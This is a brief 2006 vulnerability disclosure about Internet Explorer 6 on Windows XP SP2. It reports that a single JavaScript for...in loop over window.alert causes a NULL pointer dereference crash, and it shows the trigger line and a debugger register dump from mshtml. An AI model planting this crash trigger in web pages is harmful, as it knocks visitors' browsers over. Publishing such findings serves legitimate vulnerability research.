The following bug was tested on the latest version of Internet Explorer 6 on a fully patched Windows XP SP2 system. A NULL pointer dereference can be triggered by using JavaScript to iterate over a native function with a for...in loop.
for (var i in window.alert) { var a = 1; }
Demonstration
eax=00000000 ebx=ffffffff ecx=0013b3f0
edx=0013b3f0 esi=00000000 edi=0013b488
eip=7dceef12 esp=0013b3d0 ebp=0013b3d4
mshtml!CPtrBagVTableAggregate::CIterator::Start+0x1e:
7dceef12 ff36 push dword ptr [esi] ds:0023:00000000=?????
This bug will be added to the OSVDB:
Microsoft IE Native Function Iteration NULL Dereference
Tuesday, July 25, 2006